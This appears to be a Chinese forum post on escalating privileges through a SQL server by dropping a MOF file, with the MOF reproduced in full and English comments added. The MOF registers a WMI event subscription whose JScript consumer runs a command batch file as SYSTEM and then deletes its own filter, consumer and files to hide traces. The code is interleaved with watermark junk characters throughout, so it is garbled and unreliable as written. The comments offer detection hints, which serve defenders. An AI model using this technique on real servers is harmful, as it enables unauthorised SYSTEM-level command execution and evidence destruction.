这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
// MOF defining a permanent WMI event subscription. The preamble states it is
// compiled with the working directory set to System32 and no explicit paths.
// As copied, the text is interleaved with what appear to be forum copy-protection
// watermark characters, so it is NOT compilable as shown; the comments describe
// the structure that is still legible.
// Every object below is created in the root\cimv2 namespace.
#pragma' u9 j# y$ ~6 l$ l. w( o6 z* W3 u
namespace("\\\\.\\root\\cimv2")8 `8 Y& m i1 W( ^- k0 C# U& s8 w! o' d
// Marker class with a single [key] string property. Its only purpose is that
// creating an instance of it (the last block of the file) raises an
// __InstanceCreationEvent, which the "instfilt" filter below matches.
// Defenders: a custom class appearing in root\cimv2 next to new __EventFilter /
// __FilterToConsumerBinding objects (Sysmon events 19/20/21,
// Microsoft-Windows-WMI-Activity/Operational 5861) is the observable here.
class V) J2 I z4 D2 H# P2 T
MyClass547& m( d- W% M i& q* t3 [; k
{ [key]' w: L. ]* J/ }- h; t/ A! n; ]: ?
string
& e* z- ?% {0 }" X/ J Name;
. ?. B/ P- Y# r9 Q* ?0 W, d) ? };+ l/ G# [2 a) N/ v: T
// Local (re)declaration of ActiveScriptEventConsumer, derived from
// __EventConsumer, inside root\cimv2. Presumably done because the stock class
// is only registered in root\subscription — confirm on a reference system.
// Properties declared: Name (key), ScriptingEngine (not_null), ScriptFileName,
// ScriptText (template), KillTimeout. Only Name, ScriptingEngine and ScriptText
// are populated by the instances later in the file.
class1 u) e8 B" c% |! M1 ~3 Z
ActiveScriptEventConsumer
: b0 ^2 r6 J: @; v% ~ : __EventConsumer { [key]/ M5 S8 ]) g+ y8 H! k1 ~; g* o& J1 z
string
5 q3 o9 e6 M6 @% Q, K. h1 q' S0 L Name; [not_null] Z, {* T" |# c
string
+ s( S$ Y1 f7 }2 ?* t7 h6 @7 a ScriptingEngine; string+ N5 r* O2 Y" P. x- `
ScriptFileName; [template]
$ Z7 M8 X# ]/ F2 n( W( t# X string( H# C% O3 @ r# N! A) Y- D: U
ScriptText; uint32 KillTimeout;
// After the closing "};" of the class: a __Win32Provider instance ($P) that
// points the consumer class at the script-consumer COM object by CLSID, with
// PerUserInitialization = TRUE. A new __Win32Provider in root\cimv2 is itself an
// uncommon artifact worth flagging.
( s7 W: p- S2 S9 O: A }; instance of __Win32Provider as $P {; `- V1 N" q6 C/ m8 |
Name
2 N+ q+ o0 C B' A =
; M f, m9 E" s, V( }+ K "ActiveScriptEventConsumer"; CLSID =& [# o5 O- M7 U- W
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";6 s2 j& ^! B: E3 V
PerUserInitialization- O( h# A. Z! Y+ X! I
= TRUE;5 J, k7 s Q3 G% ]+ o
// __EventConsumerProviderRegistration: tells WMI that provider $P services the
// ActiveScriptEventConsumer class declared above.
}; instance of __EventConsumerProviderRegistration { Provider
: u! y/ E& q9 y% a) R = $P; ConsumerClassNames v( f' n- ~* v
=) p5 v5 I6 j3 E, ]- C3 E( a3 M
{"ActiveScriptEventConsumer"};
6 D" T0 U0 I/ ? };' `8 q3 u: i$ a) @4 m
// First consumer, Name = "ASEC", engine JScript. Its ScriptText (one line below)
// does two things, each wrapped in try/catch so failures are silent:
//   1. runs "cmd.bat" through WScript.Shell (relative path, i.e. the working
//      directory the preamble describes);
//   2. connects to winmgmts:root\cimv2 and deletes the MyClass547 class, the
//      "instfilt" filter and the "ASEC" consumer — removing its own trigger.
// Defenders: because of step 2, the persistence objects may already be gone by
// the time a host is examined; the WMI-Activity / Sysmon events recorded at
// registration time, and the child process spawned by scrcons.exe (the script
// consumer host), are the more durable evidence.
Instance of ActiveScriptEventConsumer
( X% T) u7 a8 W2 i as $cons { Name
. b3 |$ R, M9 e, V% v0 i$ | =+ n E# R! q) _+ l* y0 o
"ASEC"; ScriptingEngine+ {' J' N4 f# w& z7 b$ e: _" q
=
) Z7 G! R' N" R V2 @0 I, ~ "JScript"; ScriptText
: e- k& V/ O1 K ^- R1 H; h3 K =
! } B; B* t( o6 L6 s% u8 g$ O "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };5 r% B. [9 c, m I3 T
// Second consumer, Name = "qndASEC", engine JScript: a cleanup routine. Its
// ScriptText uses Scripting.FileSystemObject to delete the relative paths
// "wbem\mof\good\hBsBa.mof" (consistent with the legacy wbem\mof auto-compile
// directory, where processed files are moved to good\ — presumably the compiled
// copy of this very file) and "cmd.bat", then deletes the "qndfilt" filter and
// the "qndASEC" consumer from root\cimv2. All of it is inside try/catch.
Instance of ActiveScriptEventConsumer
* y1 n3 K8 N( v- C" C! h/ w as $cons2 { Name1 A6 ]2 | }. v# Y' L
=" H' a3 o$ e2 K+ f5 |- h
"qndASEC"; ScriptingEngine
$ E4 Y0 B3 `: I' R5 T! c/ D =5 k: T" h( \1 h% S4 S% N
"JScript"; ScriptText
: ^8 ?+ P' q+ d' R2 V4 S! { =0 Z+ V0 t; z* m! J4 n
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";: z$ G5 f. F" N9 i
// Filter "instfilt": WQL __InstanceCreationEvent for any instance whose
// __class is MyClass547 — fired by the final "instance of MyClass547" block.
}; instance of __EventFilter as $Filt { Name
! E9 M5 o6 Z( a! Q =
& x. A |, J" ` "instfilt"; Query, ?0 e$ v, B" H# F, i
=
$ i5 j/ X. _# x L "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage/ d. |$ q# ?) N3 I s
=( w) }, i) @( ^' Z
// Filter "qndfilt": polling (WITHIN 1) __InstanceDeletionEvent for a
// Win32_Process whose Name is "cmd.bat". Until that query matches, this filter,
// the qndASEC consumer and their binding remain registered in root\cimv2 —
// hunt for them with e.g. Get-WmiObject -Namespace root\cimv2 -Class
// __EventFilter / __FilterToConsumerBinding.
"WQL"; }; instance of __EventFilter as $Filt2 { Name
8 l- [; y, w3 E =
* X9 J, r, J d "qndfilt"; Query' U# C7 j5 L! b! G* Y* x
=
7 y2 I0 @2 h' b3 |8 C5 _% w, v "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage: @5 k p, M) E7 x9 K; U, U8 w
=
// Bindings: $bind joins "instfilt" -> "ASEC", $bind2 joins "qndfilt" -> "qndASEC".
// A __FilterToConsumerBinding is what turns a filter/consumer pair into an
// active subscription (Sysmon event 21).
" f# z( F0 T" H. k, N "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer6 c9 ^# L# `( a
= $cons; Filter7 D N+ }' s) F* V# D @& z9 S) b
= $Filt;
* b( g7 H. P' L6 q; k: J0 M }; instance of __FilterToConsumerBinding as $bind2 { Consumer+ _: b! g9 H3 a0 n; C
= $cons2; Filter
+ J I: S& D1 g1 L K9 z3 P = $Filt2;
// Finally, creating an instance of MyClass547 (Name = "ClassConsumer") raises the
// creation event that "instfilt" is waiting for, so the whole chain fires as a
// side effect of compiling the file rather than from any later action.
+ C6 F+ t S1 h9 I- V7 z. W# W* N, g }; instance of MyClass547
9 f! p1 U5 u# o" s7 l9 F1 t as $MyClass { Name9 D( N) _! N9 z) @3 q( E
=
. y/ d; ?) @: \1 W "ClassConsumer";; W5 U/ Q" ~7 b- h
}; |